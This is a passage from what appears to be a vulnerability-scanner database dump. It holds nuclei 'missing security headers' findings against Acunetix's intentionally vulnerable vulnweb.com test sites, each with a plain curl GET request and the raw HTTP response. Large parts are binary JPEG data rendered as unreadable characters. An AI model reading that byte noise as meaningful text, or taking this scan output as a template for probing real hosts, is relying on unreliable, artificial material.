#&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 960, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:36.690Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 961, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:36.930Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 962, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:37.227Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< 